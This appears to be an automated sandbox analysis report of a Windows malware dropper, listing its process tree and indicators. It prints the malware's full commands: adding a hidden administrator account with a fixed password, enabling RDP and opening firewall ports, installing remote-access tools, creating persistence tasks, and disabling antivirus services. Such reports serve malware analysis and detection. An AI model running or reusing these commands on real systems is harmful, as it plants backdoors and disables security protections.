    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeRestorePrivilege | 1620 | api.exe
    Token: SeTakeOwnershipPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
    Token: SeDebugPrivilege | 1620 | api.exe
  • Suspicious use of FindShellTrayWindow
    update.exe, api.exe, msiexec.exe

    Reported IOCs

    pid | process
    4932 | update.exe
    4932 | update.exe
    4932 | update.exe
    1620 | api.exe
    1620 | api.exe
    6020 | msiexec.exe
  • Suspicious use of SendNotifyMessage
    update.exe, api.exe

    Reported IOCs

    pid | process
    4932 | update.exe
    4932 | update.exe
    4932 | update.exe
    1620 | api.exe
    1620 | api.exe
  • Suspicious use of SetWindowsHookEx
    Downloads.exe, update.exe, wini.exe, winit.exe, rutserv.exe, rutserv.exe, rutserv.exe, rutserv.exe, cheat.exe, taskhost.exe, WinMail.exe, WinMail.exe, taskhostw.exe, R8.exe, utorrent.exe, azur.exe, update.exe, api.exe, OnlineInstaller.exe, OnlineInstaller.tmp, RDPWinst.exe, 002.exe, RDPWinst.exe, aliens.exe, MicrosoftEdge.exe, 97535F5358BB4449.exe, 97535F5358BB4449.exe, firefox.exe, 1605810348493.exe, firefox.exe, 1605810353930.exe, firefox.exe, 1605810359509.exe, firefox.exe, 1605810362353.exe

    Reported IOCs

    pid | process
    732 | Downloads.exe
    732 | Downloads.exe
    4028 | update.exe
    768 | wini.exe
    632 | winit.exe
    2108 | rutserv.exe
    1628 | rutserv.exe
    1276 | rutserv.exe
    2228 | rutserv.exe
    1200 | cheat.exe
    1712 | taskhost.exe
    4220 | WinMail.exe
    4192 | WinMail.exe
    4964 | taskhostw.exe
    4156 | R8.exe
    576 | utorrent.exe
    3548 | azur.exe
    4932 | update.exe
    1620 | api.exe
    1620 | api.exe
    4404 | OnlineInstaller.exe
    4856 | OnlineInstaller.tmp
    4216 | RDPWinst.exe
    5720 | 002.exe
    5720 | 002.exe
    5316 | RDPWinst.exe
    5192 | aliens.exe
    5408 | MicrosoftEdge.exe
    5304 | 97535F5358BB4449.exe
    5372 | 97535F5358BB4449.exe
    3312 | firefox.exe
    5724 | 1605810348493.exe
    5940 | firefox.exe
    5632 | 1605810353930.exe
    5424 | firefox.exe
    5392 | 1605810359509.exe
    4836 | firefox.exe
    5928 | 1605810362353.exe
  • Suspicious use of WriteProcessMemory
    update.exe, wini.exe, WScript.exe, cmd.exe, cheat.exe

    Reported IOCs

    description | pid | process | target process
    PID 4028 wrote to memory of 768 | 4028 | update.exe | wini.exe
    PID 4028 wrote to memory of 768 | 4028 | update.exe | wini.exe
    PID 4028 wrote to memory of 768 | 4028 | update.exe | wini.exe
    PID 768 wrote to memory of 3696 | 768 | wini.exe | WScript.exe
    PID 768 wrote to memory of 3696 | 768 | wini.exe | WScript.exe
    PID 768 wrote to memory of 3696 | 768 | wini.exe | WScript.exe
    PID 768 wrote to memory of 632 | 768 | wini.exe | winit.exe
    PID 768 wrote to memory of 632 | 768 | wini.exe | winit.exe
    PID 768 wrote to memory of 632 | 768 | wini.exe | winit.exe
    PID 3696 wrote to memory of 2280 | 3696 | WScript.exe | cmd.exe
    PID 3696 wrote to memory of 2280 | 3696 | WScript.exe | cmd.exe
    PID 3696 wrote to memory of 2280 | 3696 | WScript.exe | cmd.exe
    PID 2280 wrote to memory of 2596 | 2280 | cmd.exe | regedit.exe
    PID 2280 wrote to memory of 2596 | 2280 | cmd.exe | regedit.exe
    PID 2280 wrote to memory of 2596 | 2280 | cmd.exe | regedit.exe
    PID 2280 wrote to memory of 3948 | 2280 | cmd.exe | regedit.exe
    PID 2280 wrote to memory of 3948 | 2280 | cmd.exe | regedit.exe
    PID 2280 wrote to memory of 3948 | 2280 | cmd.exe | regedit.exe
    PID 2280 wrote to memory of 2164 | 2280 | cmd.exe | timeout.exe
    PID 2280 wrote to memory of 2164 | 2280 | cmd.exe | timeout.exe
    PID 2280 wrote to memory of 2164 | 2280 | cmd.exe | timeout.exe
    PID 2280 wrote to memory of 2108 | 2280 | cmd.exe | rutserv.exe
    PID 2280 wrote to memory of 2108 | 2280 | cmd.exe | rutserv.exe
    PID 2280 wrote to memory of 2108 | 2280 | cmd.exe | rutserv.exe
    PID 2280 wrote to memory of 1628 | 2280 | cmd.exe | rutserv.exe
    PID 2280 wrote to memory of 1628 | 2280 | cmd.exe | rutserv.exe
    PID 2280 wrote to memory of 1628 | 2280 | cmd.exe | rutserv.exe
    PID 2280 wrote to memory of 1276 | 2280 | cmd.exe | rutserv.exe
    PID 2280 wrote to memory of 1276 | 2280 | cmd.exe | rutserv.exe
    PID 2280 wrote to memory of 1276 | 2280 | cmd.exe | rutserv.exe
    PID 4028 wrote to memory of 1200 | 4028 | update.exe | cheat.exe
    PID 4028 wrote to memory of 1200 | 4028 | update.exe | cheat.exe
    PID 4028 wrote to memory of 1200 | 4028 | update.exe | cheat.exe
    PID 2280 wrote to memory of 996 | 2280 | cmd.exe | attrib.exe
    PID 2280 wrote to memory of 996 | 2280 | cmd.exe | attrib.exe
    PID 2280 wrote to memory of 996 | 2280 | cmd.exe | attrib.exe
    PID 4028 wrote to memory of 1208 | 4028 | update.exe | schtasks.exe
    PID 4028 wrote to memory of 1208 | 4028 | update.exe | schtasks.exe
    PID 4028 wrote to memory of 1208 | 4028 | update.exe | schtasks.exe
    PID 2280 wrote to memory of 1624 | 2280 | cmd.exe | attrib.exe
    PID 2280 wrote to memory of 1624 | 2280 | cmd.exe | attrib.exe
    PID 2280 wrote to memory of 1624 | 2280 | cmd.exe | attrib.exe
    PID 4028 wrote to memory of 2896 | 4028 | update.exe | schtasks.exe
    PID 4028 wrote to memory of 2896 | 4028 | update.exe | schtasks.exe
    PID 4028 wrote to memory of 2896 | 4028 | update.exe | schtasks.exe
    PID 2280 wrote to memory of 2456 | 2280 | cmd.exe | sc.exe
    PID 2280 wrote to memory of 2456 | 2280 | cmd.exe | sc.exe
    PID 2280 wrote to memory of 2456 | 2280 | cmd.exe | sc.exe
    PID 1200 wrote to memory of 1712 | 1200 | cheat.exe | taskhost.exe
    PID 1200 wrote to memory of 1712 | 1200 | cheat.exe | taskhost.exe
    PID 1200 wrote to memory of 1712 | 1200 | cheat.exe | taskhost.exe
    PID 2280 wrote to memory of 1344 | 2280 | cmd.exe | sc.exe
    PID 2280 wrote to memory of 1344 | 2280 | cmd.exe | sc.exe
    PID 2280 wrote to memory of 1344 | 2280 | cmd.exe | sc.exe
    PID 4028 wrote to memory of 1080 | 4028 | update.exe | schtasks.exe
    PID 4028 wrote to memory of 1080 | 4028 | update.exe | schtasks.exe
    PID 4028 wrote to memory of 1080 | 4028 | update.exe | schtasks.exe
    PID 2280 wrote to memory of 64 | 2280 | cmd.exe | sc.exe
    PID 2280 wrote to memory of 64 | 2280 | cmd.exe | sc.exe
    PID 2280 wrote to memory of 64 | 2280 | cmd.exe | sc.exe
    PID 4028 wrote to memory of 2532 | 4028 | update.exe | schtasks.exe
    PID 4028 wrote to memory of 2532 | 4028 | update.exe | schtasks.exe
    PID 4028 wrote to memory of 2532 | 4028 | update.exe | schtasks.exe
    PID 4028 wrote to memory of 3828 | 4028 | update.exe | cmd.exe
  • Views/modifies file attributes
    attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe

    TTPs

    Hidden Files and Directories

    Reported IOCs

    pid | process
    996 | attrib.exe
    1624 | attrib.exe
    5476 | attrib.exe
    5168 | attrib.exe
    4576 | attrib.exe
Processes 289
  • C:\Users\Admin\AppData\Local\Temp\Downloads.exe
    "C:\Users\Admin\AppData\Local\Temp\Downloads.exe"
    Modifies registry class
    Suspicious use of SetWindowsHookEx
    PID:732
  • C:\Users\Admin\Desktop\update.exe
    "C:\Users\Admin\Desktop\update.exe"
    Drops file in Drivers directory
    Executes dropped EXE
    Modifies WinLogon
    Drops file in Program Files directory
    NTFS ADS
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:4028
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:768
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        Suspicious use of WriteProcessMemory
        PID:3696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          Suspicious use of WriteProcessMemory
          PID:2280
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            Runs .reg file with regedit
            PID:2596
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            Runs .reg file with regedit
            PID:3948
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            Delays execution with timeout.exe
            PID:2164
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            Executes dropped EXE
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:2108
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            Executes dropped EXE
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of SetWindowsHookEx
            PID:1628
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            Executes dropped EXE
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:1276
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            Views/modifies file attributes
            PID:996
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:1624
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID:2456
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            PID:1344
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            PID:64
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        PID:632
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          Suspicious use of SetWindowsHookEx
          PID:4220
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            Suspicious use of SetWindowsHookEx
            PID:4192
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          PID:4336
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            Delays execution with timeout.exe
            PID:4528
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1200
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        Executes dropped EXE
        NTFS ADS
        Suspicious use of SetWindowsHookEx
        PID:1712
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          Executes dropped EXE
          Adds Run key to start application
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of SetWindowsHookEx
          PID:4964
        • C:\ProgramData\Microsoft\Intel\R8.exe
          C:\ProgramData\Microsoft\Intel\R8.exe
          Executes dropped EXE
          Modifies registry class
          Suspicious use of SetWindowsHookEx
          PID:4156
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            PID:804
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              Modifies registry class
              PID:984
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                Suspicious use of AdjustPrivilegeToken
                PID:4228
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                Suspicious use of AdjustPrivilegeToken
                PID:2892
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                Delays execution with timeout.exe
                PID:200
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                PID:4600
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                Executes dropped EXE
                PID:4844
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                Suspicious use of AdjustPrivilegeToken
                PID:4316
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4956
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                PID:4920
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  PID:976
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    PID:5020
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    PID:1492
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    PID:4184
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    PID:1044
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      PID:3992
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    PID:3656
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    PID:744
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      PID:4264
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    PID:4508
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      PID:4488
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    PID:4352
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      PID:4432
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    PID:4632
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      PID:4444
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    PID:4980
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:4748
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    PID:4764
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      PID:3680
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    PID:4908
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      PID:4556
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    PID:4812
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      PID:4540
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    PID:1792
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:5092
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -i -o
                    Executes dropped EXE
                    Modifies WinLogon
                    Drops file in Program Files directory
                    Suspicious use of AdjustPrivilegeToken
                    PID:1400
                    • C:\Windows\SYSTEM32\netsh.exe
                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                      PID:4500
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -w
                    Executes dropped EXE
                    PID:5692
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    PID:5912
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    PID:6032
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      PID:6108
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:5476
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:5168
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    Views/modifies file attributes
                    PID:4576
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:5112
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
          Drops file in Drivers directory
          PID:4312
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
          Creates scheduled task(s)
          PID:4544
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
          Creates scheduled task(s)
          PID:484
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
          Creates scheduled task(s)
          PID:4408
        • C:\ProgramData\WindowsTask\update.exe
          C:\ProgramData\WindowsTask\update.exe
          Executes dropped EXE
          Suspicious use of FindShellTrayWindow
          Suspicious use of SendNotifyMessage
          Suspicious use of SetWindowsHookEx
          PID:4932
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
      Creates scheduled task(s)
      PID:1208
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
      Creates scheduled task(s)
      PID:2896
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
      Creates scheduled task(s)
      PID:1080
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
      Creates scheduled task(s)
      PID:2532
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      PID:3828
      • C:\Windows\SysWOW64\sc.exe
        sc start appidsvc
        PID:2276
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appmgmt
      PID:2100
      • C:\Windows\SysWOW64\sc.exe
        sc start appmgmt
        PID:1536
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
      PID:1616
      • C:\Windows\SysWOW64\sc.exe
        sc config appidsvc start= auto
        PID:2172
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
      PID:2640
      • C:\Windows\SysWOW64\sc.exe
        sc config appmgmt start= auto
        PID:1088
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      PID:412
      • C:\Windows\SysWOW64\sc.exe
        sc delete swprv
        PID:4068
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      PID:3208
      • C:\Windows\SysWOW64\sc.exe
        sc stop mbamservice
        PID:3792
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      PID:3872
      • C:\Windows\SysWOW64\sc.exe
        sc stop bytefenceservice
        PID:3416
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      PID:3364
      • C:\Windows\SysWOW64\sc.exe
        sc delete bytefenceservice
        PID:980
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      PID:2624
      • C:\Windows\SysWOW64\sc.exe
        sc delete mbamservice
        PID:3264
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      PID:740
      • C:\Windows\SysWOW64\sc.exe
        sc delete crmsvc
        PID:3592
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      PID:1500
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state on
        PID:3268
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      PID:3840
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        PID:1264
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      PID:1612
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        PID:3688
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      PID:1732
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        PID:3384
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      PID:2384
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        PID:2732
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
      PID:508
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:1904
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      PID:2620
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:924
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
      PID:988
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:2920
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      PID:2092
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:1368
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
      PID:3000
      • C:\Windows\SysWOW64\icacls.exe
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4124
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      PID:4168
      • C:\Windows\SysWOW64\icacls.exe
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:4212
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
      PID:4236
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4280
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      PID:4292
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        Modifies file permissions
        PID:4344
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
      PID:4364
      • C:\Windows\SysWOW64\icacls.exe
        icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4496
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      PID:4376
      • C:\Windows\SysWOW64\icacls.exe
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:4504
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
      PID:4396
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4548
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      PID:4520
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:4640
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
      PID:4532
      • C:\Windows\SysWOW64\icacls.exe
        icacls c:\programdata\Malwarebytes /deny Admin:(F)
        Modifies file permissions
        PID:4648
    • C:\Windows\SysWOW64\cmd.exe
